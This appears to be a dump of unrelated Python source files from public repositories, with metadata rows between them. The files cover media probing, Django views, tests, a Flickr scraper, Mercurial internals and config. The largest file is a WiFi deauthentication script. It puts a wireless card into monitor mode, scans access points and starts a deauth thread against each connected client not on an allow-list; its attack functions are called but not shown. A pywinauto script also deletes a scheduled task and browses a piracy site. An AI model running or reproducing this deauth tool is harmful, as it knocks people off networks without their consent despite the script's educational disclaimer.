    """Run ffprobe on *filename* and return its output parsed from JSON.

    Args:
        filename: path of the media file to inspect.
        cmd: probe executable to invoke (default ``'ffprobe'``).
        timeout: optional number of seconds to wait for the process.

    Raises:
        FileExistsError: if *filename* does not exist.
        ProbeException: if the probe process exits with a non-zero status.
    """
    if not os.path.isfile(filename):
        # NOTE(review): FileNotFoundError would be the more accurate type,
        # but FileExistsError is kept so existing callers' handlers still
        # match.  The message now actually names the offending path.
        raise FileExistsError(f"Input file {filename!r} does not exist.")
    args = [cmd, '-show_format', '-show_streams', '-of', 'json', filename]
    p = subprocess.Popen(
        args,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )
    # communicate(timeout=None) blocks until exit, which is exactly what the
    # old kwargs-dict dance did when no timeout was supplied.
    out, err = p.communicate(timeout=timeout)
    if p.returncode != 0:
        raise ProbeException('ffprobe', out, err)
    return json.loads(out.decode('utf-8'))
| 24.529412 | 72 | 0.640288 |
c063c02a86fbd38bc9d19422a9222b6d2583e226 | 252 | py | Python | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | example/func_doc.py | tinashime/Python27 | b632918c7368a9bcfc5af8353e136247d954fb5e | [
"bzip2-1.0.6"
] | null | null | null | def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
print x,'is maximun'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
| 18 | 41 | 0.575397 |
c064dd6092bc97df5e3082e40d12bf519228fd1e | 16,602 | py | Python | wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 5bead83038aadf53fc868fb9a786cb37824b18eb | [
"MIT"
] | 1,353 | 2021-01-07T17:12:01.000Z | 2022-03-31T21:30:38.000Z | wifi_dos_own.py | deepahir/red-python-scripts | 5deef698bf505de30735120e7c3bab34707ad32c | [
"MIT"
] | 29 | 2021-01-30T21:12:16.000Z | 2022-03-04T15:06:12.000Z | wifi_dos_own.py | deepahir/red-python-scripts | 5deef698bf505de30735120e7c3bab34707ad32c | [
"MIT"
] | 1,238 | 2021-01-07T17:05:18.000Z | 2022-03-31T23:25:04.000Z | #!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
    """Exit immediately unless the script was launched through sudo."""
    # sudo exports SUDO_UID into the environment; its absence means we are
    # not running with super user privileges.
    if 'SUDO_UID' not in os.environ:
        print("Try running this program with sudo.")
        exit()
def find_nic():
    """Return the wireless interface names (e.g. 'wlan0') on this machine."""
    # "iw dev" lists every wireless device; the module-level wlan_code
    # regex pulls the interface names out of that output.
    output = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
    return wlan_code.findall(output)
def set_monitor_mode(controller_name):
    """Put the given network interface controller into monitor mode.

    Argument: controller_name -- interface name, e.g. 'wlan0'.
    """
    # BUGFIX: the body previously ignored controller_name and operated on the
    # module-level wifi_name; the parameter is now honoured, so the function
    # works no matter which interface name the caller passes.
    # Take the interface down before changing its mode.
    subprocess.run(["ip", "link", "set", controller_name, "down"])
    # Killing conflicting processes makes sure that nothing interferes with
    # putting the controller into monitor mode.
    subprocess.run(["airmon-ng", "check", "kill"])
    # Put the WiFi nic in monitor mode.
    subprocess.run(["iw", controller_name, "set", "monitor", "none"])
    # Bring the WiFi controller back online.
    subprocess.run(["ip", "link", "set", controller_name, "up"])
def set_band_to_monitor(choice):
    """Start airodump-ng in the background on the selected band(s).

    choice -- "0" scans 2.4GHz (bands b/g), "1" scans 5GHz (band a),
    anything else scans the full spectrum (bands a/b/g).
    """
    # The three original branches were identical copy-pasted commands that
    # differed only in the --band value, so the band is looked up instead.
    band = {"0": "bg", "1": "a"}.get(choice, "abg")
    subprocess.Popen(
        ["airodump-ng", "--band", band, "-w", "file",
         "--write-interval", "1", "--output-format", "csv", wifi_name],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
    """Move all .csv files in the current directory into ./backup/."""
    for file_name in os.listdir():
        # Leftover capture files from an earlier run would confuse the csv
        # parsing later on, so anything found here gets moved aside.
        if ".csv" in file_name:
            print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
            directory = os.getcwd()
            backup_dir = os.path.join(directory, "backup")
            try:
                os.mkdir(backup_dir)
            # BUGFIX: this was a bare `except:`, which also silently
            # swallowed unrelated failures such as permission errors.
            except FileExistsError:
                print("Backup folder exists.")
            # Timestamp prefix keeps successive backups from colliding.
            timestamp = datetime.now()
            shutil.move(file_name, os.path.join(backup_dir, str(timestamp) + "-" + file_name))
def check_for_essid(essid, lst):
    """Return True when *essid* is not yet present in any entry of *lst*.

    A True result tells the caller the row may be appended; False means an
    entry whose ESSID contains *essid* already exists.  Note this is a
    substring containment test, not strict equality.
    """
    return not any(essid in known["ESSID"] for known in lst)
def wifi_networks_menu():
    """ Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
    active_wireless_networks = list()
    try:
        while True:
            # We want to clear the screen before we print the network interfaces.
            subprocess.call("clear", shell=True)
            for file_name in os.listdir():
                # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
                # The following list contains the field names for the csv entries.
                fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
                if ".csv" in file_name:
                    with open(file_name) as csv_h:
                        # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
                        # This creates a list of dictionaries with the keys as specified in the fieldnames.
                        csv_h.seek(0)
                        csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
                        for row in csv_reader:
                            # Skip the header row of the access-point section.
                            if row["BSSID"] == "BSSID":
                                pass
                            # "Station MAC" marks the start of the client
                            # section of airodump's csv; stop reading there.
                            elif row["BSSID"] == "Station MAC":
                                break
                            elif check_for_essid(row["ESSID"], active_wireless_networks):
                                active_wireless_networks.append(row)
            print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
            print("No |\tBSSID |\tChannel|\tESSID |")
            print("___|\t___________________|\t_______|\t______________________________|")
            for index, item in enumerate(active_wireless_networks):
                # We're using the print statement with an f-string.
                # F-strings are a more intuitive way to include variables when printing strings,
                # rather than ugly concatenations.
                print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
            # We make the script sleep for 1 second before loading the updated list.
            time.sleep(1)
    except KeyboardInterrupt:
        print("\nReady to make choice.")
    # Ensure that the input choice is valid.
    # NOTE(review): non-numeric or out-of-range input raises ValueError /
    # IndexError here instead of reaching the "try again" branch.
    while True:
        net_choice = input("Please select a choice from above: ")
        if active_wireless_networks[int(net_choice)]:
            return active_wireless_networks[int(net_choice)]
        print("Please try again.")
def set_into_managed_mode(wifi_name):
    """Return the network interface controller to managed mode and restart
    the NetworkManager service.

    ARGUMENTS: wifi_name -- the interface to restore, e.g. 'wlan0'.
    """
    # Same four commands as before, issued in the same order from one loop:
    # link down -> managed mode -> link up -> restart the network service.
    for command in (
            ["ip", "link", "set", wifi_name, "down"],
            ["iwconfig", wifi_name, "mode", "managed"],
            ["ip", "link", "set", wifi_name, "up"],
            ["service", "NetworkManager", "start"],
    ):
        subprocess.run(command)
# Regular Expressions to be used.
# Twelve hex digits, each optionally followed by a colon -- i.e. a MAC address.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
# Captures interface names such as "wlan0" from `iw dev` output.
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?  Abort early: the ip/iw/airmon-ng calls below need root.
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
    print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
    macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
    # Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
    macs_not_to_kick_off = mac_address_regex.findall(macs)
    # We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
    # (airodump reports station MACs in uppercase, so comparisons later match.)
    macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
    # If you entered a valid MAC Address the program flow will continue and break out of the while loop.
    if len(macs_not_to_kick_off) > 0:
        break
    print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
    wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
    print("Please select the type of scan you want to run.")
    for index, controller in enumerate(wifi_controller_bands):
        print(f"{index} - {controller}")
    # Check if the choice exists. If it doesn't it asks the user to try again.
    # We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
    band_choice = input("Please select the bands you want to scan from the list above: ")
    try:
        if wifi_controller_bands[int(band_choice)]:
            # Since the choice exists and is an integer we can cast band choice as an integer.
            band_choice = int(band_choice)
            break
    except:
        # Catches ValueError (non-numeric input) and IndexError (choice out
        # of range) alike, then simply re-prompts.
        print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
    # If no networks interface controllers connected to your computer the program will exit.
    print("Please connect a network interface controller and try again!")
    exit()
# Select the network interface controller you want to put into monitor mode.
while True:
    for index, controller in enumerate(network_controllers):
        print(f"{index} - {controller}")
    controller_choice = input("Please select the controller you want to put into monitor mode: ")
    try:
        if network_controllers[int(controller_choice)]:
            break
    except:
        # Re-prompt on non-numeric or out-of-range input.
        print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
# NOTE(review): get_clients is defined elsewhere in this file; presumably it
# starts a client-only airodump capture for this BSSID -- verify upstream.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
    while True:
        count = 0  # NOTE(review): assigned but never used.
        # We want to clear the screen before we print the network interfaces.
        subprocess.call("clear", shell=True)
        for file_name in os.listdir():
            # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
            # The following list contains the field names for the csv entries.
            fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
            if ".csv" in file_name and file_name.startswith("clients"):
                with open(file_name) as csv_h:
                    print("Running")
                    # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
                    # This creates a list of dictionaries with the keys as specified in the fieldnames.
                    csv_h.seek(0)
                    csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
                    for index, row in enumerate(csv_reader):
                        # The first few rows are headers/summary, not clients.
                        if index < 5:
                            pass
                        # We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
                        elif row["Station MAC"] in macs_not_to_kick_off:
                            pass
                        else:
                            # Add all the active MAC Addresses.
                            active_clients.add(row["Station MAC"])
        print("Station MAC |")
        print("______________________|")
        for item in active_clients:
            # We're using the print statement with an f-string.
            # F-strings are a more intuitive way to include variables when printing strings,
            # rather than ugly concatenations.
            print(f"{item}")
            # Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
            if item not in threads_started:
                # It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
                threads_started.append(item)
                # We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
                # A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
                t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
                t.start()
except KeyboardInterrupt:
    print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
| 50.1571 | 219 | 0.634743 |
c0668c5403b0ea8527a26c2985cb37df3eafd6d0 | 597 | py | Python | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 7975688355fba8b0f8349dd55a1b6cb625c3efd0 | [
"MIT"
] | null | null | null | import subprocess
def get_gpu_memory_map():
    '''Return a dict of GPU device id (int) -> memory usage in MB (int).'''
    # With this query/format combination nvidia-smi prints one bare number
    # per GPU, one per line.
    output = subprocess.check_output(
        [
            'nvidia-smi', '--query-gpu=memory.used',
            '--format=csv,nounits,noheader'
        ], encoding='utf-8')
    usage = [int(line) for line in output.strip().split('\n')]
    # Device ids are simply the positions in nvidia-smi's output order.
    return dict(enumerate(usage))
| 27.136364 | 66 | 0.631491 |
c066f48fe0ef8d58aa4b19024e03a53d9943e528 | 2,010 | py | Python | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | fee0be214b393af2184d565eb1e9aebb4eb6eeec | [
"MIT"
] | null | null | null | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
if __name__ == '__main__':
    # Hand the raw command-line args to unittest so it can select tests.
    unittest.main(argv=argv)
| 30.923077 | 79 | 0.656716 |
c0670360313a88da7a90013e4063946791935b2d | 11,795 | py | Python | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | app/parking/views.py | zollf/CITS3200 | 95fb7569dad325c057e441cd7265d3e85735c058 | [
"CC0-1.0"
] | null | null | null | from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
| 36.292308 | 120 | 0.603815 |
c068ebb6bccce46da01fec0d1da4f714e0e2357e | 33,949 | py | Python | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | utils.py | eepLearning/learn2learn | 4ed48e69f1ca5c9508331e15fd4a8f65c3cae750 | [
"MIT"
] | null | null | null | import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
    """
    [[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)

    **Description**

    Applies a single MAML gradient step of size *lr* to *model*.

    Instead of in-place tensor updates, the Python object graph is re-routed:
    the module itself is updated in place (no deepcopy) but the parameters'
    tensors are not.

    **Arguments**

    * **model** (Module) - The model to update.
    * **lr** (float) - The learning rate used to update the model.
    * **grads** (list, *optional*, default=None) - A list of gradients for each
        parameter of the model. If None, will use the gradients in .grad
        attributes.

    **Example**
    ~~~python
    maml = l2l.algorithms.MAML(Model(), lr=0.1)
    model = maml.clone() # The next two lines essentially implement model.adapt(loss)
    grads = autograd.grad(loss, model.parameters(), create_graph=True)
    maml_update(model, lr=0.1, grads)
    ~~~
    """
    if grads is not None:
        params = list(model.parameters())
        if len(params) != len(grads):
            # A length mismatch usually means the grads belong to a
            # different model; warn but continue with the zipped prefix.
            print('WARNING:maml_update(): Parameters and gradients have different '
                  'length. (' + str(len(params)) + ' vs ' + str(len(grads)) + ')')
        for param, grad in zip(params, grads):
            if grad is not None:
                # Attach the proposed step; update_module applies it.
                param.update = -lr * grad
    return update_module(model)
# Adapt the model #support loss
####new fake adopt 1
#####fake_adopt 3
#############fake adopt 4
#############fake adopt 5
#############fake adopt 6
#############fake adopt 7 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
#fake7 : 1
# loss
# , =>
# ??
#############fake adopt 8 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
##0812
#############fake adopt 9 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
# + (support grad / query loss)
# + class
# fake7 : 1
# loss
# , =>
# ??
#############fake adopt 8 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
### (FP 9,10 )
# CLIENT 32 DISJOINT .
# 16 # 16 .
| 34.855236 | 113 | 0.745353 |
c06a8301008200b139bb039c709d82f05d2164d7 | 1,602 | py | Python | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | null | null | null | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | 3 | 2017-08-21T07:26:11.000Z | 2017-11-09T02:19:23.000Z | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | null | null | null | #coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'  # NOTE(review): not referenced in the visible code.
# get_log_config (defined elsewhere in this module) presumably returns a
# dictConfig-compatible mapping for the 'sigda' logger -- verify upstream.
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
# Emit one record so the configured handlers can be checked by eye.
logging.error('catch error again2')
| 23.910448 | 92 | 0.473159 |
c06b4470ee6ba272de73e528bcb01060567707f9 | 142 | py | Python | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | null | null | null | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | 6 | 2020-06-06T01:27:17.000Z | 2022-02-10T11:20:17.000Z | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | null | null | null | from instanotifier.fetcher import tests
| 20.285714 | 59 | 0.739437 |
c06b5a0da650cb5b7106dc53e3294c6abe96376c | 676 | py | Python | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | import sqlite3
if __name__ == '__main__':
    # Entry point; main() is defined elsewhere in this script.
    main()
| 22.533333 | 79 | 0.597633 |
fbe36d61bbb46c7d89d9f7a7b5921b3928eef150 | 366 | py | Python | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | import sqlite3
# Open (and create on first use) the local agenda database file.
con = sqlite3.connect('agenda.db')
try:
    cursor = con.cursor()
    try:
        cursor.execute('''
        create table if not exists agenda(
        nome text,
        telefone text)
        ''')
        # Parameterized insert: the values are bound by sqlite3, never
        # formatted into the SQL string.
        cursor.execute('''
        insert into agenda(nome, telefone)
        values(?, ?)
        ''', ("Tamara", "51-98175-0510"))
        # Persist the insert before tearing the connection down.
        con.commit()
    finally:
        # BUGFIX: the cursor and connection are now released even when a
        # statement raises (the original leaked both on error).
        cursor.close()
finally:
    con.close()
fbe380b10e29919d567688beee1e5f00654464f3 | 4,298 | py | Python | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 16 | 2020-06-05T01:26:04.000Z | 2020-09-18T23:56:14.000Z | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 13 | 2020-06-01T17:35:22.000Z | 2020-09-22T23:19:27.000Z | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 2 | 2020-06-06T06:10:58.000Z | 2020-06-08T07:19:24.000Z | import logging
import math
import re
import time
import dask
import numpy as np
import requests
import json
import xml.etree.ElementTree as ET
from falconcv.data.scraper.scraper import ImagesScraper
from falconcv.util import ImageUtil
# Module-level logger, named after this module for easy filtering.
logger = logging.getLogger(__name__)
# Base URL of the Flickr REST API.
FLICKR_ENDPOINT = "https://www.flickr.com/services/rest"
# List of sizes:
# url_o: Original (4520 3229)
# url_k: Large 2048 (2048 1463)
# url_h: Large 1600 (1600 1143)
# url_l=: Large 1024 (1024 732)
# url_c: Medium 800 (800 572)
# url_z: Medium 640 (640 457)
# url_m: Medium 500 (500 357)
# url_n: Small 320 (320 229)
# url_s: Small 240 (240 171)
# url_t: Thumbnail (100 71)
# url_q: Square 150 (150 150)
# url_sq: Square 75 (75 75)
| 37.701754 | 90 | 0.543509 |
fbe3b3f30ddf6f664ac393236c6cc50652de4531 | 9,893 | py | Python | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | # argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
| 39.730924 | 153 | 0.574548 |
fbe4f5813f57f07bcd01eac89fa0f4bcc8abfeac | 1,326 | py | Python | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | # pip install -U pywinauto
from pywinauto.application import Application
import subprocess
import time
subprocess.run('SCHTASKS /DELETE /TN BuildTasks\\Sites /f')
app = Application(backend='uia')
app.start('C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe --force-renderer-accessibility ')
window = app.top_window()
# Allow the registry installed extensions to load...
time.sleep(45)
ch_window = window.child_window(title="Address and search bar", control_type="Edit")
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}chrome://extensions/{ENTER}')
time.sleep(3)
# Enable Honey (or disable google drive offline)
dlg = window.button6
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (or Soccer wallpapers)
dlg = window.button9
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (if it exists)
dlg = window.button12
try:
dlg.click()
except Exception:
dlg.close()
time.sleep(5)
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}https://thepiratebay.org{ENTER}')
time.sleep(10)
# Allow notifications
dlg = window.AllowButton
try:
dlg.wait_not('visible', timeout=2)
dlg.click()
except Exception:
dlg.close()
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}{BACKSPACE}https://yts.mx{ENTER}')
time.sleep(3)
window.close()
| 27.625 | 103 | 0.748115 |
fbe52989054e585791a8f893935e850e1910b673 | 992 | py | Python | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ----------------------------------------------------------------------
# Migrate SLAProbe to workflow
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from pymongo import UpdateMany
from bson import ObjectId
# NOC modules
from noc.core.migration.base import BaseMigration
| 31 | 90 | 0.484879 |
fbe699dad305df809951dcf85f4ec36f0f78ab23 | 2,640 | py | Python | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | # dirstateguard.py - class to allow restoring dirstate after failure
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from .i18n import _
from . import (
error,
narrowspec,
util,
)
| 34.736842 | 77 | 0.610227 |
fbe71debd90d8d660d1121d1807a3090d9eabd7b | 2,061 | py | Python | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | null | null | null | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | 12 | 2017-10-25T08:05:32.000Z | 2019-11-13T14:29:42.000Z | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | 1 | 2017-10-24T10:13:55.000Z | 2017-10-24T10:13:55.000Z | """
CONFIGURATION FILE
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 18 oct. 2018
@author: Roi Sucasas - ATOS
"""
#!/usr/bin/python
dic = { "VERSION": "1.3.10",
# USER MANAGEMENT MODULE MODE: "DEFAULT", "MF2C" , "STANDALONE"
"UM_MODE": "MF2C",
# CIMI
"CIMI_URL": "http://cimi:8201/api",
"DEVICE_USER": "rsucasas",
# SERVER - REST API
"SERVER_PORT": 46300,
"HOST_IP": "localhost",
"API_DOC_URL": "/api/v2/um",
# working dir: "C://TMP/tmp/mf2c/um/" "/tmp/mf2c/um/"
"UM_WORKING_DIR_VOLUME": "/tmp/mf2c/um/",
# db
"DB_SHARING_MODEL": "dbt1",
"DB_USER_PROFILE": "dbt2",
